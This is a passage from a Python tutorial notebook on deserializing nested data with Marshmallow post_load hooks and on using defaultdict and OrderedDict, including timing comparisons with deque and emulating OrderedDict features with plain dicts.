             'date': datetime.date(2018, 11, 22),
             'high': Decimal('177.25'),
             'low': Decimal('176.64'),
             'open': Decimal('176.66'),
             'symbol': 'AAPL',
             'volume': 3699184},
            {'close': Decimal('103.11'),
             'date': datetime.date(2018, 11, 22),
             'high': Decimal('103.48'),
             'low': Decimal('103.07'),
             'open': Decimal('103.25'),
             'symbol': 'MSFT',
             'volume': 4493689}],
 'trades': [{'commission': Decimal('9.99'),
             'order': 'buy',
             'price': Decimal('338.25'),
             'symbol': 'TSLA',
             'timestamp': datetim

That's looking pretty good, but you'll notice something - the objects in the `trades` and `quotes` list have been loaded into plain dictionary objects, not `Trade` and `Stock` objects:

In [19]:
type(activity_deser['trades'][0])

dict

For this we have to remember to provide functions decorated with `@post_load`:

In [20]:
from marshmallow import post_load

class TradeSchema(Schema):
    symbol = fields.Str()
    timestamp = fields.DateTime()
    order = fields.Str()
    price = fields.Decimal(as_string=True)
    commission = fields.Decimal(as_string=True)
    volume = fields.Integer()
    
    @post_load
    def make_trade(self, data):
        return Trade(**data)

In [21]:
class StockSchema(Schema):
    symbol = fields.Str()
    date = fields.Date()
    open = fields.Decimal(as_string=True)
    high = fields.Decimal(as_string=True)
    low = fields.Decimal(as_string=True)
    close = fields.Decimal(as_string=True)
    volume = fields.Integer()
    
    @post_load()
    def make_stock(self, data):
        return Stock(**data)

And of course we have to redefine our `ActivitySchema` to make sure it is referencing the newly defined sub schema classes:

In [22]:
class ActivitySchema(Schema):
    trades = fields.Nested(TradeSchema, many=True)
    quotes = fields.Nested(StockSchema, many=True)

And now we can try this again:

In [23]:
activity_deser = ActivitySchema().loads(result).data

TypeError: __init__() got an unexpected keyword argument 'open'

So here we have an issue - basically our method to construct a new `Stock` object expects the argument for the open price to be `open_`, and not `open` which is what our schema is producing.

There is more than one way to fix this. Here we change the method that builds the `Stock` object, so that it renames the `open` key to `open_` before calling the constructor:

In [24]:
class StockSchema(Schema):
    symbol = fields.Str()
    date = fields.Date()
    open = fields.Decimal(as_string=True)
    high = fields.Decimal(as_string=True)
    low = fields.Decimal(as_string=True)
    close = fields.Decimal(as_string=True)
    volume = fields.Integer()
    
    @post_load()
    def make_stock(self, data):
        data['open_'] = data.pop('open')
        return Stock(**data)
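
The renaming step used in `make_stock` can be tried on its own, without Marshmallow. This is only a sketch: the `Bar` class and the `loaded` dictionary are hypothetical, and here the rename is done on a copy so the original dictionary is left unchanged (the schema method above modifies `data` in place).

```python
class Bar:
    # hypothetical class whose constructor uses a trailing underscore
    def __init__(self, symbol, open_):
        self.symbol = symbol
        self.open = open_

loaded = {'symbol': 'TSLA', 'open': '338.19'}

try:
    Bar(**loaded)
    direct_ok = True
except TypeError:
    # 'open' is not a parameter name of Bar.__init__
    direct_ok = False

# rename on a copy so the loaded dictionary itself is left unchanged
kwargs = dict(loaded)
kwargs['open_'] = kwargs.pop('open')
bar = Bar(**kwargs)
print(direct_ok, bar.open, loaded)
```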

In [25]:
class ActivitySchema(Schema):
    trades = fields.Nested(TradeSchema, many=True)
    quotes = fields.Nested(StockSchema, many=True)

In [26]:
activity_deser = ActivitySchema().loads(result).data

In [27]:
pprint(activity_deser)

{'quotes': [<__main__.Stock object at 0x105e70e80>,
            <__main__.Stock object at 0x105e70eb8>,
            <__main__.Stock object at 0x105e70ef0>],
 'trades': [<__main__.Trade object at 0x105e70c18>,
            <__main__.Trade object at 0x105e70b70>]}


So, let's just recap the various schemas we have to create:

In [28]:
class StockSchema(Schema):
    symbol = fields.Str()
    date = fields.Date()
    open = fields.Decimal(as_string=True)
    high = fields.Decimal(as_string=True)
    low = fields.Decimal(as_string=True)
    close = fields.Decimal(as_string=True)
    volume = fields.Integer()
    
    @post_load()
    def make_stock(self, data):
        data['open_'] = data.pop('open')
        return Stock(**data)
    
class TradeSchema(Schema):
    symbol = fields.Str()
    timestamp = fields.DateTime()
    order = fields.Str()
    price = fields.Decimal(as_string=True)
    commission = fields.Decimal(as_string=True)
    volume = fields.Integer()
    
    @post_load
    def make_trade(self, data):
        return Trade(**data)
    
class ActivitySchema(Schema):
    trades = fields.Nested(TradeSchema, many=True)
    quotes = fields.Nested(StockSchema, many=True)

As you can see this is a whole lot easier than doing it by hand using the standard library.

# Section 09 - Specialized Dictionaries

##  defaultdict

The `defaultdict` is a specialized dictionary found in the `collections` module. (It is a subclass of the `dict` type).

In [1]:
from collections import defaultdict

Standard dictionaries in Python will raise an exception if we try to access a non-existent key:

In [2]:
d = {}

In [3]:
d['a']

KeyError: 'a'

Now, we can certainly use the `.get` method:

In [4]:
result = d.get('a')
type(result)

NoneType

And we can even specify a default value for the key if it is not present:

In [5]:
d.get('a', 0)

0

Often we have dictionaries where we want to return a consistent default value if the requested key does not exist.

Although we can do so using the `.get` method as above, we have to remember to use the same default value every time - plus it gets a little cumbersome.

Let's say we want to keep track of the number of occurrences of individual characters in a string.

We might approach it this way:

In [6]:
counts = {}
sentence = "able was I ere I saw elba"

for c in sentence:
    if c in counts:
        counts[c] += 1
    else:
        counts[c] = 1

In [7]:
counts

{'a': 4, 'b': 2, 'l': 2, 'e': 4, ' ': 6, 'w': 2, 's': 2, 'I': 2, 'r': 1}

So this works, but we have that `if` statement - it would be nice to simplify our code somewhat:

In [8]:
counts = {}
for c in sentence:
    counts[c] = counts.get(c, 0) + 1

In [9]:
counts

{'a': 4, 'b': 2, 'l': 2, 'e': 4, ' ': 6, 'w': 2, 's': 2, 'I': 2, 'r': 1}

So, that works well and is much cleaner. But if we have to specify that default value (`0` in this case) many times in our code when working with the same dictionary, we have to remember what the default needs to be each time.

Instead, we could use a `defaultdict`. In a `defaultdict` we specify what the default value is for a missing key - more precisely, we specify a default factory method that is called:

In [10]:
counts = defaultdict(lambda : 0)

In [11]:
for c in sentence:
    counts[c] += 1

In [12]:
counts

defaultdict(<function __main__.<lambda>()>,
            {'a': 4,
             'b': 2,
             'l': 2,
             'e': 4,
             ' ': 6,
             'w': 2,
             's': 2,
             'I': 2,
             'r': 1})

As you can see, that simplified our code quite a bit, but the result is not quite a plain dictionary - it is a `defaultdict`. However, it inherits from `dict`, so all the dictionary methods we have grown to know and love are still available, because a `defaultdict` **is** a `dict`:

In [13]:
isinstance(counts, defaultdict)

True

In [14]:
isinstance(counts, dict)

True

And `counts` behaves like a regular dictionary too:

In [15]:
counts.items()

dict_items([('a', 4), ('b', 2), ('l', 2), ('e', 4), (' ', 6), ('w', 2), ('s', 2), ('I', 2), ('r', 1)])

In [16]:
counts['a']

4

The main difference is when we request a non-existent key:

In [17]:
counts['python']

0

We get the default value back - not only that, but it actually created that key as well:

In [18]:
counts

defaultdict(<function __main__.<lambda>()>,
            {'a': 4,
             'b': 2,
             'l': 2,
             'e': 4,
             ' ': 6,
             'w': 2,
             's': 2,
             'I': 2,
             'r': 1,
             'python': 0})

So this is a bit different from using `.get`.
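
To make that difference concrete, here is a short sketch (the `tally` dictionary is just an example). Neither `.get` nor a membership test uses the default factory or creates the key. Only indexing a missing key does:

```python
from collections import defaultdict

tally = defaultdict(int, a=4)

via_get = tally.get('x')          # the default factory is not used here
has_x_after_get = 'x' in tally    # membership tests do not create keys either

via_index = tally['x']            # indexing a missing key calls the factory and stores the result
has_x_after_index = 'x' in tally

print(via_get, has_x_after_get, via_index, has_x_after_index)
```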

And of course we can manipulate our dictionary just like a standard dictionary:

In [19]:
counts['hello'] = 'world'
counts

defaultdict(<function __main__.<lambda>()>,
            {'a': 4,
             'b': 2,
             'l': 2,
             'e': 4,
             ' ': 6,
             'w': 2,
             's': 2,
             'I': 2,
             'r': 1,
             'python': 0,
             'hello': 'world'})

In [20]:
del counts['hello']
counts

defaultdict(<function __main__.<lambda>()>,
            {'a': 4,
             'b': 2,
             'l': 2,
             'e': 4,
             ' ': 6,
             'w': 2,
             's': 2,
             'I': 2,
             'r': 1,
             'python': 0})

Very often you will see what looks like a **type** specified as the default factory - but keep in mind that it is in fact the corresponding functions (constructors) that are actually being specified.

For example:

In [21]:
int()

0

In [22]:
bool()

False

In [23]:
str()

''

In [24]:
list()

[]

In [25]:
d = defaultdict(int)
d['a']

0

In [26]:
d = defaultdict(bool)
d['a']

False

In [27]:
d = defaultdict(str)
d['a']

''

In [28]:
d = defaultdict(list)
d['a']

[]

Note that this is no different than writing:

In [29]:
d = defaultdict(lambda: list())
d['a']

[]
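
Because the factory is **called** for each missing key, every key gets its own fresh object. The sketch below (with example names `groups` and `strict`) shows this, and also shows that the factory is stored in the `default_factory` attribute. If that factory is `None`, a missing key raises a `KeyError` just as with a plain `dict`:

```python
from collections import defaultdict

groups = defaultdict(list)
groups['a'].append(1)
groups['b'].append(2)

# each missing key triggered its own call to list(), so nothing is shared
distinct = groups['a'] is not groups['b']

# the factory is stored on the instance and can be inspected
factory = groups.default_factory

# with no factory (None), a defaultdict raises KeyError like a plain dict
strict = defaultdict(None, a=1)
try:
    strict['missing']
    raised = False
except KeyError:
    raised = True

print(dict(groups), distinct, factory is list, raised)
```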

Let's take a look at another example of where a `defaultdict` can be useful.

Suppose we have a dictionary structure that has people's names as keys, and a dictionary for the value that contains the person's eye color. We want to create a dictionary of eye colors, with a list of the people's names that have that eye color:

In [30]:
persons = {
    'john': {'age': 20, 'eye_color': 'blue'},
    'jack': {'age': 25, 'eye_color': 'brown'},
    'jill': {'age': 22, 'eye_color': 'blue'},
    'eric': {'age': 35},
    'michael': {'age': 27}
}

What we want is a dictionary with the eye colors (and `unknown` as the key if the eye color was not specified), and the names of the people with that eye color.

Let's first do this without a `defaultdict`, and also not using `.get`:

In [31]:
eye_colors = {}
for person, details in persons.items():
    if 'eye_color' in details:
        color = details['eye_color']
    else:
        color = 'unknown'
    if color in eye_colors:
        eye_colors[color].append(person)
    else:
        eye_colors[color] = [person]

In [32]:
eye_colors

{'blue': ['john', 'jill'], 'brown': ['jack'], 'unknown': ['eric', 'michael']}

Now let's simplify this by leveraging the `.get` method:

In [33]:
eye_colors = {}
for person, details in persons.items():
    color = details.get('eye_color', 'Unknown')
    person_list = eye_colors.get(color, [])
    person_list.append(person)
    eye_colors[color] = person_list

In [34]:
eye_colors

{'blue': ['john', 'jill'], 'brown': ['jack'], 'Unknown': ['eric', 'michael']}
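
As a side note, plain dictionaries also have a `setdefault` method that can shorten this particular pattern a little further. A minimal sketch, using a smaller, hypothetical `people` dictionary:

```python
people = {
    'john': {'age': 20, 'eye_color': 'blue'},
    'jack': {'age': 25, 'eye_color': 'brown'},
    'jill': {'age': 22, 'eye_color': 'blue'},
    'eric': {'age': 35},
}

by_color = {}
for name, details in people.items():
    color = details.get('eye_color', 'Unknown')
    # setdefault returns the existing list, or stores and returns a new one
    by_color.setdefault(color, []).append(name)

print(by_color)
```

Note that the default still has to be repeated at every call site, which is the same drawback we saw with `.get`.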

And finally let's use a `defaultdict`:

In [35]:
eye_colors = defaultdict(list)
for person, details in persons.items():
    color = details.get('eye_color', 'Unknown')
    eye_colors[color].append(person)

In [36]:
eye_colors

defaultdict(list,
            {'blue': ['john', 'jill'],
             'brown': ['jack'],
             'Unknown': ['eric', 'michael']})

When we create a `defaultdict` we have to specify the factory method as the first argument, but thereafter we can specify key/value pairs just like we would with the `dict` constructor (they are basically just passed along to the underlying `dict`):

In [37]:
d = defaultdict(bool, k1=True, k2=False, k3='python')

In [38]:
d

defaultdict(bool, {'k1': True, 'k2': False, 'k3': 'python'})
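
The same holds for the other argument forms the `dict` constructor accepts. As a quick sketch (the variable names are just examples), a mapping or an iterable of key/value pairs can follow the factory, optionally combined with keyword arguments:

```python
from collections import defaultdict

from_mapping = defaultdict(int, {'a': 1, 'b': 2})
from_pairs = defaultdict(int, [('a', 1), ('b', 2)])
mixed = defaultdict(int, {'a': 1}, b=2)

all_equal = from_mapping == from_pairs == mixed
missing_value = mixed['c']   # the factory still applies to missing keys
print(all_equal, missing_value)
```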

So, using this, if we had used a `defaultdict` for the Person values, we could simplify our previous example a bit more:

In [39]:
persons = {
    'john': defaultdict(lambda: 'unknown', 
                        age=20, eye_color='blue'),
    'jack': defaultdict(lambda: 'unknown',
                        age=20, eye_color='brown'),
    'jill': defaultdict(lambda: 'unknown',
                        age=22, eye_color='blue'),
    'eric': defaultdict(lambda: 'unknown', age=35),
    'michael': defaultdict(lambda: 'unknown', age=27)
}

In [40]:
eye_colors = defaultdict(list)
for person, details in persons.items():
    eye_colors[details['eye_color']].append(person)

In [41]:
eye_colors

defaultdict(list,
            {'blue': ['john', 'jill'],
             'brown': ['jack'],
             'unknown': ['eric', 'michael']})

It was a little tedious defining that `defaultdict` for every instance in our `persons` dictionary.

This is a good example of where a **partial** function would be really useful. (I cover partial functions in Part 1 of this series, or you can review the documentation here: https://docs.python.org/3.7/library/functools.html#functools.partial)

(You can also just use a lambda function.)

In [42]:
from functools import partial

In [43]:
eyedict = partial(defaultdict, lambda: 'unknown')

Alternatively we could also just define it this way:

In [44]:
eyedict = lambda *args, **kwargs: defaultdict(lambda: 'unknown', *args, **kwargs)
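
Both definitions should behave the same way. The following sketch uses the hypothetical names `make_partial` and `make_lambda` so that the two variants can be compared side by side:

```python
from collections import defaultdict
from functools import partial

make_partial = partial(defaultdict, lambda: 'unknown')
make_lambda = lambda *args, **kwargs: defaultdict(lambda: 'unknown', *args, **kwargs)

p = make_partial(age=35)
q = make_lambda({'age': 35})

same_content = p == q
p_color = p['eye_color']   # missing key, so the factory supplies 'unknown'
q_color = q['eye_color']
print(same_content, p_color, q_color, type(p).__name__)
```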

In [45]:
persons = {
    'john': eyedict(age=20, eye_color='blue'),
    'jack': eyedict(age=20, eye_color='brown'),
    'jill': eyedict(age=22, eye_color='blue'),
    'eric': eyedict(age=35),
    'michael': eyedict(age=27)
}

In [46]:
persons

{'john': defaultdict(<function __main__.<lambda>.<locals>.<lambda>()>,
             {'age': 20, 'eye_color': 'blue'}),
 'jack': defaultdict(<function __main__.<lambda>.<locals>.<lambda>()>,
             {'age': 20, 'eye_color': 'brown'}),
 'jill': defaultdict(<function __main__.<lambda>.<locals>.<lambda>()>,
             {'age': 22, 'eye_color': 'blue'}),
 'eric': defaultdict(<function __main__.<lambda>.<locals>.<lambda>()>,
             {'age': 35}),
 'michael': defaultdict(<function __main__.<lambda>.<locals>.<lambda>()>,
             {'age': 27})}

And we can use our previous code just as before:

In [47]:
eye_colors = defaultdict(list)
for person, details in persons.items():
    eye_colors[details['eye_color']].append(person)

In [48]:
eye_colors

defaultdict(list,
            {'blue': ['john', 'jill'],
             'brown': ['jack'],
             'unknown': ['eric', 'michael']})

Let's look at another example where we use a non-deterministic factory. We could make a database call, an API call, and so on. To keep this simple I'm going to use the current time as my default.

In this example we want to keep track of how many times certain functions are being called, as well as when they were **first** called. To do this I want to be able to decorate the functions I want to keep track of, and I want to be able to specify the dictionary that should be used, so that I can keep a reference to it and examine the results.


In [49]:
from collections import defaultdict, namedtuple
from datetime import datetime
from functools import wraps

def function_stats():
    d = defaultdict(lambda: {"count": 0, "first_called": datetime.utcnow()})
    Stats = namedtuple('Stats', 'decorator data')
    
    def decorator(fn):
        @wraps(fn)
        def wrapper(*args, **kwargs):
            d[fn.__name__]['count'] += 1
            return fn(*args, **kwargs)
        return wrapper
    
    return Stats(decorator, d)        

In [50]:
stats = function_stats()

In [51]:
dict(stats.data)

{}

In [52]:
@stats.decorator
def func_1():
    pass

@stats.decorator
def func_2(x, y):
    pass

In [53]:
dict(stats.data)

{}

In [54]:
func_1()

In [55]:
dict(stats.data)

{'func_1': {'count': 1,
  'first_called': datetime.datetime(2018, 12, 29, 22, 43, 48, 828143)}}

In [56]:
func_1()

In [57]:
dict(stats.data)

{'func_1': {'count': 2,
  'first_called': datetime.datetime(2018, 12, 29, 22, 43, 48, 828143)}}

In [58]:
func_2(10, 20)

In [59]:
dict(stats.data)

{'func_1': {'count': 2,
  'first_called': datetime.datetime(2018, 12, 29, 22, 43, 48, 828143)},
 'func_2': {'count': 1,
  'first_called': datetime.datetime(2018, 12, 29, 22, 43, 49, 714090)}}
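
The reason `first_called` does not change on later calls is that the factory runs only once per key, at the moment the key is first found to be missing. Here is a small sketch of that behavior, where a counter (the hypothetical `ticket`) stands in for the clock so the result is reproducible:

```python
from collections import defaultdict
from itertools import count

ticket = count(1)   # hypothetical stand-in for a clock or an API call
first_seen = defaultdict(lambda: next(ticket))

# the second lookup of 'func_1' finds the stored value and does not call the factory
order = [first_seen['func_1'], first_seen['func_2'], first_seen['func_1']]

factory_calls = next(ticket) - 1   # how many values the factory has consumed so far
print(order, factory_calls)
```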

##  OrderedDict

Prior to Python 3.7, dictionary key order was not guaranteed. This became part of the language in 3.7, so the usefulness of `OrderedDict` is diminished - but it is still necessary if you want your dictionaries to maintain key order **and** be compatible with Python versions earlier than 3.6 (technically dicts are ordered in 3.6 as well, but it was considered an implementation detail, and not actually guaranteed).

We'll come back to a direct comparison of `OrderedDict` and plain `dict` in a subsequent video. For now let's look at the `OrderedDict` as if we were targeting our code to be compatible with earlier versions of Python.

In [1]:
from collections import OrderedDict

Once again, `OrderedDict` is a subclass of `dict`.

We can also pass keyword arguments to the constructor. However, in Python versions prior to 3.6, the order of the keyword arguments is not guaranteed to be preserved - so to be fully backward-compatible, insert keys into the dictionary **after** you have created it as an empty dictionary.

Let's try it out:

In [2]:
d = OrderedDict()

In [3]:
d['z'] = 'hello'

In [4]:
d['y'] = 'world'

In [5]:
d['a'] = 'python'

In [6]:
d

OrderedDict([('z', 'hello'), ('y', 'world'), ('a', 'python')])

And if we iterate through the keys of the `OrderedDict` we will retain that key order as well:

In [7]:
for key in d:
    print(key)

z
y
a


The `OrderedDict` also supports reverse iteration using `reversed()`:

In [8]:
for key in reversed(d):
    print(key)

a
y
z


This was not the case for a standard dictionary before Python 3.8, even in Python 3.6 and 3.7 where key order is maintained! (Plain dictionaries only gained support for `reversed()` in Python 3.8.)

In the next video we'll dig a little more into a comparison between `OrderedDicts` and `dicts`.

In [9]:
d = {'a': 1, 'b': 2}
for key in reversed(d):
    print(key)

TypeError: 'dict' object is not reversible
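
If reverse iteration over a plain `dict` is needed on one of those older versions, one simple workaround is to materialize the keys into a list first. A minimal sketch, with an example dictionary named `sample`:

```python
sample = {'a': 1, 'b': 2, 'c': 3}

# materializing the keys first works on any version with ordered dicts (3.6+)
reversed_keys = list(reversed(list(sample)))
print(reversed_keys)
```

On Python 3.8 and later, `reversed(sample)` works directly.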

`OrderedDicts` are a subclass of `dicts` so all the usual operations and methods apply, but `OrderedDicts` have a couple of extra methods available to us:
1. `popitem(last=True)`
2. `move_to_end(key, last=True)`

Since an `OrderedDict` has an ordering, it is natural to think of the *first* or *last* element in the dictionary.

The `popitem` method allows us to remove the last item (the default) or the first item (by setting `last=False`):

In [10]:
d = OrderedDict()
d['first'] = 10
d['second'] = 20
d['third'] = 30
d['last'] = 40

In [11]:
d

OrderedDict([('first', 10), ('second', 20), ('third', 30), ('last', 40)])

In [12]:
d.popitem()

('last', 40)

In [13]:
d

OrderedDict([('first', 10), ('second', 20), ('third', 30)])

As you can see the last item was popped off (and returned as a key/value tuple). To pop the first item we can do this:

In [14]:
d.popitem(last=False)

('first', 10)

In [15]:
d

OrderedDict([('second', 20), ('third', 30)])

The `move_to_end` method simply moves the specified key to the end (by default), or to the beginning (if `last=False` is specified) of the dictionary:

In [16]:
d = OrderedDict()
d['first'] = 10
d['second'] = 20
d['third'] = 30
d['last'] = 40

In [17]:
d.move_to_end('second')

In [18]:
d

OrderedDict([('first', 10), ('third', 30), ('last', 40), ('second', 20)])

In [19]:
d.move_to_end('third', last=False)

In [20]:
d

OrderedDict([('third', 30), ('first', 10), ('last', 40), ('second', 20)])

Be careful: if you specify a non-existent key, you will get a `KeyError` exception:

In [21]:
d.move_to_end('x')

KeyError: 'x'
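
A typical situation where `move_to_end` and `popitem(last=False)` are used together is a small "least recently used" cache. The `TinyLRU` class below is a hypothetical sketch for illustration only, not a production cache. It also shows one way to avoid the `KeyError` by checking for the key first:

```python
from collections import OrderedDict

class TinyLRU:
    # hypothetical minimal least-recently-used cache, for illustration only
    def __init__(self, maxsize=2):
        self.maxsize = maxsize
        self.data = OrderedDict()

    def get(self, key, default=None):
        if key not in self.data:
            return default          # avoids the KeyError from move_to_end
        self.data.move_to_end(key)  # mark as most recently used
        return self.data[key]

    def put(self, key, value):
        self.data[key] = value
        self.data.move_to_end(key)
        if len(self.data) > self.maxsize:
            self.data.popitem(last=False)  # evict the least recently used

cache = TinyLRU(maxsize=2)
cache.put('a', 1)
cache.put('b', 2)
cache.get('a')       # 'a' becomes the most recent entry
cache.put('c', 3)    # evicts 'b', the oldest remaining entry
remaining = list(cache.data)
print(remaining)
```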

#### Equality Comparisons

With regular dictionaries, two dictionaries are considered equal (`==`) if they contain the same key/value pairs, irrespective of the ordering.

In [22]:
d1 = {'a': 10, 'b': 20}
d2 = {'b': 20, 'a': 10}

In [23]:
d1 == d2

True

But this is not the case with `OrderedDicts` - since ordering matters here, two `OrderedDicts` will compare equal only if their key/value pairs are equal **and** the keys are in the same order:

In [24]:
d1 = OrderedDict()
d1['a'] = 10
d1['b'] = 20

d2 = OrderedDict()
d2['a'] = 10
d2['b'] = 20

d3 = OrderedDict()
d3['b'] = 20
d3['a'] = 10


print(d1)
print(d2)
print(d3)

OrderedDict([('a', 10), ('b', 20)])
OrderedDict([('a', 10), ('b', 20)])
OrderedDict([('b', 20), ('a', 10)])


In [25]:
d1 == d2

True

In [26]:
d1 == d3

False

Now, an `OrderedDict` is a subclass of a standard `dict`:

In [27]:
isinstance(d1, OrderedDict)

True

In [28]:
isinstance(d1, dict)

True

So, can we compare an `OrderedDict` with a plain `dict`?

The answer is yes, and in this case order does **not** matter:

In [29]:
d1 = OrderedDict()
d1['a'] = 10
d1['b'] = 20

d2 = {'b': 20, 'a': 10}

print(d1)
print(d2)

OrderedDict([('a', 10), ('b', 20)])
{'b': 20, 'a': 10}


In [30]:
d1 == d2

True

In [31]:
d2 == d1

True
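
If we do want an order-sensitive comparison between an `OrderedDict` and a plain `dict`, we have to ask for it explicitly. Two possible approaches are sketched below (the names `od` and `plain` are just examples, and this assumes a Python version where plain dicts preserve insertion order):

```python
from collections import OrderedDict

od = OrderedDict([('a', 10), ('b', 20)])
plain = {'b': 20, 'a': 10}

same_content = od == plain                             # order ignored
same_order = list(od.items()) == list(plain.items())   # order respected
both_ordered = od == OrderedDict(plain)                # OrderedDict vs OrderedDict
print(same_content, same_order, both_ordered)
```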

#### Using an OrderedDict as a Stack or Queue

If you are familiar with stacks and queues, you are probably wondering if the `popitem` method means we can effectively use an `OrderedDict` as a stack or a queue.

Well yes, we can, but the real question is whether it is as efficient as using a `deque` for example.

Let's try it out and do some timings:

In [32]:
from timeit import timeit

In [33]:
from collections import deque

In [34]:
def create_ordereddict(n=100):
    d = OrderedDict()
    for i in range(n):
        d[str(i)] = i
    return d

In [35]:
def create_deque(n=100):
    return deque(range(n))   

Now let's time how long it takes to pop off the last element of each data structure repeatedly until the structure is empty.

Instead of testing each time if the structure is empty, I'm going to simply pop items until I get an exception - since I only expect one exception and many, many more successful pop attempts, this will be more efficient.

A `deque` will raise an `IndexError` exception if we attempt to pop an item from an empty `deque`. The `OrderedDict` will raise a `KeyError` exception.

In [36]:
def pop_all_ordered_dict(n=1000, last=True):
    d = create_ordereddict(n)
    while True:
        try:
            d.popitem(last=last)
        except KeyError:
            # done popping
            break           

In [37]:
def pop_all_deque(n=1000, last=True):
    dq = create_deque(n)
    if last:
        pop = dq.pop
    else:
        pop = dq.popleft

    while True:
        try:
            pop()
        except IndexError:
            break


Now let's go ahead and time these operations, both the creations and the pops:

In [38]:
timeit('create_ordereddict(10_000)', 
       globals=globals(), 
       number=1_000)

2.2906384040252306

In [39]:
timeit('create_deque(10_000)', 
       globals=globals(), 
       number=1_000)

0.1509137399843894

Now let's time popping elements - keep in mind that we are also timing the recreation of the data structures every time as well - so our timings are going to be biased because of that. A very rough way of rectifying that will be to subtract how much time we measured above for creating the structures by themselves:

In [40]:
n = 10_000
number = 1_000

results = dict()

results['dict_create'] = timeit('create_ordereddict(n)', 
                                globals=globals(), 
                                number=number)

results['deque_create'] = timeit('create_deque(n)', 
                                 globals=globals(), 
                                 number=number)

results['dict_create_pop_last'] = timeit(
    'pop_all_ordered_dict(n, last=True)',
    globals=globals(), number=number)

results['dict_create_pop_first'] = timeit(
    'pop_all_ordered_dict(n, last=False)',
    globals=globals(), number=number)

results['deque_create_pop_last'] = timeit(
    'pop_all_deque(n, last=True)',
    globals=globals(), number=number
)

results['deque_create_pop_first'] = timeit(
    'pop_all_deque(n, last=False)',
    globals=globals(), number=number
)

results['dict_pop_last'] = (
    results['dict_create_pop_last'] - results['dict_create'])

results['dict_pop_first'] = (
    results['dict_create_pop_first'] - results['dict_create'])

results['deque_pop_last'] = (
    results['deque_create_pop_last'] - results['deque_create'])

results['deque_pop_first'] = (
    results['deque_create_pop_first'] - results['deque_create'])

for key, result in results.items():
    print(f'{key}: {result}')


dict_create: 2.3447022930486128
deque_create: 0.15744277997873724
dict_create_pop_last: 4.827248840010725
dict_create_pop_first: 4.72704964800505
deque_create_pop_last: 0.3677212379989214
deque_create_pop_first: 0.3731844759895466
dict_pop_last: 2.482546546962112
dict_pop_first: 2.382347354956437
deque_pop_last: 0.2102784580201842
deque_pop_first: 0.2157416960108094


As you can see, even though we can certainly use an `OrderedDict` as a stack or queue (and there might be good reasons why we want to use a dictionary for such structures), if you can use a `deque` you will get much faster performance.

One good reason might be if you need both a stack/queue and frequent checks for the existence of items - searching a `deque` (like searching a list) is very inefficient compared to a dictionary lookup, so depending on your use case the faster lookups of an `OrderedDict` might be worth its slower popping/inserting.
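
As a rough sketch of that trade-off, here is a small FIFO queue backed by an `OrderedDict` that also supports fast membership tests. The class name `UniqueQueue` and its methods are hypothetical, made up for this illustration, and the sketch assumes that queued items are hashable and that each item should appear in the queue at most once:

```python
from collections import OrderedDict


class UniqueQueue:
    """FIFO queue with dictionary-speed membership tests (illustrative only)."""

    def __init__(self):
        self._items = OrderedDict()

    def push(self, item):
        # setdefault leaves an already-queued item in its current position
        self._items.setdefault(item, None)

    def pop(self):
        # popitem(last=False) removes the oldest entry;
        # it raises KeyError if the queue is empty
        key, _ = self._items.popitem(last=False)
        return key

    def __contains__(self, item):
        return item in self._items

    def __len__(self):
        return len(self._items)


q = UniqueQueue()
q.push('a')
q.push('b')
q.push('a')          # already queued, so nothing changes
print(len(q))        # 2
print('b' in q)      # True
print(q.pop())       # a
```

Whether this beats a `deque` plus a separate `set` depends on the workload, so it is worth timing both for your own use case.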

##  OrderedDict vs Python 3.6 Plain Dicts

So, the question, if we are targeting Python 3.6+ is whether we lose anything by not using an `OrderedDict` since plain `dicts` now preserve key order.

As we saw in the previous video there were a few features that `OrderedDicts` offer that `dicts` do not have:

* reverse iteration
* pop first/last item
* move key to beginning/end of dictionary
* equality (`==`) that takes key order into account

We can actually achieve all of these things using plain dictionaries, it's just not as straightforward as using the `OrderedDict` methods - although I would not be surprised if Python dictionaries eventually get this functionality now that they have a guaranteed key order preservation.

In [40]:
from collections import OrderedDict

#### Reverse Iteration

In [41]:
d1 = OrderedDict(a=1, b=2, c=3, d=4)
d2 = dict(a=1, b=2, c=3, d=4)

In [42]:
print(d1)
print(d2)

OrderedDict([('a', 1), ('b', 2), ('c', 3), ('d', 4)])
{'a': 1, 'b': 2, 'c': 3, 'd': 4}


In [43]:
for k in reversed(d1):
    print(k)

d
c
b
a


This will not work with a plain dictionary, and neither will it work with the views.

But, it looks like this will get implemented in Python 3.8 - https://bugs.python.org/issue33462

For now, it can be done but it means making a list out of the keys, and then iterating through the reversed list:

In [44]:
for k in reversed(list(d2.keys())):
    print(k)

d
c
b
a


This is of course not ideal since we have to make a copy of all the keys into a list first - not very efficient. So, we should probably wait for Python 3.8 :-)
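
For reference, `reversed()` support for plain dictionaries and their views did land in Python 3.8. The sketch below uses a version check (an addition for illustration, not part of the original notebook) so that it runs on older interpreters as well, falling back to the list-based approach there:

```python
import sys

d2 = dict(a=1, b=2, c=3, d=4)

if sys.version_info >= (3, 8):
    # Python 3.8+: plain dicts and their views support reversed() directly,
    # so no intermediate list of keys is needed
    reversed_keys = list(reversed(d2))
    reversed_items = list(reversed(d2.items()))
else:
    # Older versions: copy the keys/items into a list first
    reversed_keys = list(reversed(list(d2)))
    reversed_items = list(reversed(list(d2.items())))

print(reversed_keys)   # ['d', 'c', 'b', 'a']
print(reversed_items)  # [('d', 4), ('c', 3), ('b', 2), ('a', 1)]
```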

#### Popping Items

Next let's look at `popitem` - we need to be able to pop either the first or the last element.

To do this, we really need to be able to determine the *first* and *last* key in the dictionary - again, this is not something we currently have natively in plain dictionaries, so we need to calculate them ourselves.

Getting the first key is not difficult - we simply retrieve the first key from the keys() view for example:

In [45]:
first_key = next(iter(d2.keys()))
print(d2)
print(first_key)

{'a': 1, 'b': 2, 'c': 3, 'd': 4}
a


Finding the last key is a bit more challenging, but fortunately, we can just use the `popitem` method on plain dictionaries that is guaranteed to pop the last inserted item - again, this is a guarantee only in Python 3.7 and above:

In [46]:
d1 = OrderedDict(a=1, b=2, c=3, d=4)
d2 = dict(a=1, b=2, c=3, d=4)

print(d2)
print(d2.popitem())
print(d2)

{'a': 1, 'b': 2, 'c': 3, 'd': 4}
('d', 4)
{'a': 1, 'b': 2, 'c': 3}


So we could combine these into a custom function as follows:

In [47]:
def popitem(d, last=True):
    if last:
        return d.popitem()
    else:
        first_key = next(iter(d.keys()))
        return first_key, d.pop(first_key)

In [48]:
d2 = dict(a=1, b=2, c=3, d=4)
print(d2)
print(popitem(d2))
print(d2)

{'a': 1, 'b': 2, 'c': 3, 'd': 4}
('d', 4)
{'a': 1, 'b': 2, 'c': 3}


In [33]:
d2 = dict(a=1, b=2, c=3, d=4)
print(d2)
print(popitem(d2, last=False))
print(d2)

